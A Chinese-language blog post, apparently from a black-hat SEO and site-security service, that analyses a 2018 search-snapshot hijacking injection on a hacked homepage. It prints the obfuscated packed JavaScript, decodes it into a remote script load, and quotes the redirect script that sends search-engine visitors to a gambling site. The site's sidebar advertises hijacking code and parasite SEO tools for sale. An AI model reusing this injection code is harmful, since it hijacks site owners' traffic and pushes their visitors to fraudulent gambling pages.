富贵长生天做主由不得我
钢骨正气我做主由不得天
当前位置:网站快照劫持代码-快照删除-黑帽SEO > 网站安全 > 正文

2018年最流行的快照劫持手法-纠出幕后黑客真实JS地址

2018-04-25 分类:网站安全 阅读(855) 评论(0)

黑客篡改首页 的文件

网站名称和网站关键 词 全部经过 unicode 加密,unicode解密很简单,就不多说了。 直接打开看到的是加密的代码,但是蜘蛛爬过去就是一下赌博站的词和句子。,过不了多久。百度就会报毒,降权。

<script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p;}(‘m[“\\e\\c\\1\\l\\i\\8\\n\\0”][“\\7\\4\\9\\0\\8”](\’\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\\2\\1\\4\\9\\3\\0\\h\’);’,29,29,’x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76′.split(‘|’),0,{}))
</script>

上面这个JS 代码加密代码负责来路跳转,有两重加密,站长站解密后得到

< script type = “text/javascript” > window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6b\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e’); < /script>

JS 再次解密后得到

< script type = “text/javascript” > window[“document”][“write”](‘<script type=”text/javascript” src=”https://www.cpdas8.com/k8.js”></script>’); < /script>

所以黑客调用 的是 https://www.cpdas8.com/k8.js

document.writeln(“<script LANGUAGE=\”Javascript\”>”); document.writeln(“var s=document.referrer”); document.writeln(“if(s.indexOf(\”baidu\”)>0 || s.indexOf(\”sogou\”)>0 || s.indexOf(\”soso\”)>0 ||s.indexOf(\”sm\”)>0 ||s.indexOf(\”uc\”)>0 ||s.indexOf(\”bing\”)>0 ||s.indexOf(\”yahoo\”)>0 ||s.indexOf(\”so\”)>0 )”); document.writeln(“location.href=\”https://www.k8das8.com/\”;”); document.writeln(“</script>”);

很明显了,来路跳转,所有搜索引擎过去的流量都劫持到了 这个赌博站https://www.k8das8.com

赞(0)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《2018年最流行的快照劫持手法-纠出幕后黑客真实JS地址》
文章链接:https://www.lolmm.cn/wzcgal/183.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

相关推荐

评论 抢沙发

评论前必须登录!

 

关于本站

QQ : 8801-5351
灰机:https://t.me/black0ri 
星期一—五:8:00–18:00
星期六—日:11:00–15:00
专注服务器,网站安全。黑帽SEO、黑帽优化、 网站快照劫持、修复、安全加固、快照删除。

SEO推荐

新一代站群系统 三天收录上万 做搜狗和360

非寄生虫,也不用劫持,这站群怎么都比寄生虫好,投入少,效果好

黑帽推荐

2023寄生虫

2023寄生虫 无限繁殖 多种繁殖方式、跨站无限轮链,自动转码 原价3000。限时7折,赠劫持代码

热门文章